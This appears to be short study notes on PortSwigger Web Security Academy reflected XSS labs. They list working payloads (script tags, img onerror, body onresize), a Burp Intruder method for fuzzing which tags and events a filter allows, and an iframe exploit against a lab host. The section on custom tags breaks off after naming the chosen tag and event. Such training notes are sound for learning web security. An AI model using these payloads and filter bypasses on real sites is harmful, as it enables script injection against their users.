https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Reflected XSS into HTML context with nothing encoded

<script>alert(1)</script>

<img src=1 onerror=alert(1)>

Reflected XSS into HTML context with most tags and attributes blocked

When we try standard XSS we get “tag not allowed”

with intruder we fuzz /?search=<§§> with all tags

we find that body is accepted

with intruder we fuzz /?search=<body+§§=1> with all events

we find that onresize is accepted

we can craft this payload in our exploit server to call print on the victim

GET /?search=<body onresize=print()>

<iframe src="<https://0a1000a303b690d5809c6cea00c90049.web-security-academy.net/?search=%3Cbody+onresize=print()%3E>" onload=this.style.width='100px'>

Reflected XSS into HTML context with all tags blocked except custom ones

only custom tags and weird ones allowed, but all events accepted

we chose tag xss and event onfocus